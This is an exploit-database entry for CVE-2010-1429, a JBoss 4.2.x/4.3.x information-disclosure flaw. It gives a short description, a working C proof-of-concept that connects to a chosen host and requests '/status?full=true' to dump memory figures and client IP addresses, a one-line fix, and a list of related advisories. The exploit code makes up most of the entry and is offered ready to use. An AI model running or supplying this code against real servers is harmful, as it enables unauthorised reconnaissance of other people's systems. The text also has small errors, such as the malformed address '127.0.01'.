Lucene search
JameelNabbo1337DAY-ID-29751HistoryFeb 10, 2018 - 12:00 a.m.
JBoss 4.2.x/4.3.x - Information Disclosure Exploit
2018-02-1000:00:00
JameelNabbo
0day.today
46
0.006 Low
EPSS
Percentile
75.4%
Exploit for multiple platform in category remote exploits
# Exploit Title: JBoss sensitive information disclosure 4.2X & 4.3.X
# Exploit Author: JameelNabbo
# Vendor Homepage: http://www.jboss.org <http://www.jboss.org/>
# Software Link: http://jbossas.jboss.org/downloads <http://jbossas.jboss.org/downloads>
# Version: 4.2X. & 4.3.X
# Tested on: Linux Ubuntu
# CVE : CVE-2010-1429
1. Description
By requesting the Status param and sitting its value to true, Jobss will print a sensitive information such as Memory used/Total Memory / Client IP address.
Example: http://127.0.01/status?full=true
2. Proof of Concept
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <netinet/tcp.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netdb.h>
int socket_connect(char *host, in_port_t port){
struct hostent *hp;
struct sockaddr_in addr;
int on = 1, sock;
if((hp = gethostbyname(host)) == NULL){
herror("gethostbyname");
exit(1);
}
bcopy(hp->h_addr, &addr.sin_addr, hp->h_length);
addr.sin_port = htons(port);
addr.sin_family = AF_INET;
sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
setsockopt(sock, IPPROTO_TCP, TCP_NODELAY, (const char *)&on, sizeof(int));
if(sock == -1){
perror("setsockopt");
exit(1);
}
if(connect(sock, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)) == -1){
perror("connect");
exit(1);
}
return sock;
}
#define BUFFER_SIZE 1024
int main(int argc, char *argv[]){
int fd;
char buffer[BUFFER_SIZE];
if(argc < 3){
fprintf(stderr, "Usage: %s <hostname> <port>\n", argv[0]);
exit(1);
}
fd = socket_connect(argv[1], atoi(argv[2]));
write(fd, "GET /status?full=true\r\n", strlen("GET /status?full=true\r\n")); // write(fd, char[]*, len);
while(read(fd, buffer, BUFFER_SIZE - 1) != 0){
fprintf(stderr, "%s", buffer);
}
shutdown(fd, SHUT_RDWR);
close(fd);
return 0;
}
3. Solution :
Update to version 4.2.3 or later
# 0day.today [2018-04-14] #Related
packetstorm
packetstorm
JBoss 4.2.x / 4.3.x Information Disclosure
2018-02-09 00:00:00
exploitdb
exploitdb
JBoss 4.2.x/4.3.x - Information Disclosure
2018-02-10 00:00:00
prion
prion
Design/Logic Flaw
2010-04-28 22:30:00
cve
cve
CVE-2010-1429
2010-04-28 22:30:00
nuclei
nuclei
nessus
nessus
JBoss Enterprise Application Platform (EAP) Status Servlet Request Remote Information Disclosure
2008-08-13 00:00:00
JBoss EAP < 4.2.0.CP09 / 4.3.0.CP08 Multiple Vulnerabilities
2010-04-29 00:00:00
RHEL 4 : JBoss EAP (RHSA-2010:0376)
2013-01-24 00:00:00
veracode
veracode
Information Disclosure
2020-04-10 00:42:54
openvas
openvas
Red Hat JBoss Products Multiple Vulnerabilities (status page) - Active Check
2011-09-16 00:00:00
Red Hat JBoss Products Multiple Vulnerabilities (jmx-console) - Active Check
2010-04-28 00:00:00
redhat
redhat
seebug
seebug
JBoss企业应用平台多个非授权访问漏洞
2010-04-29 00:00:00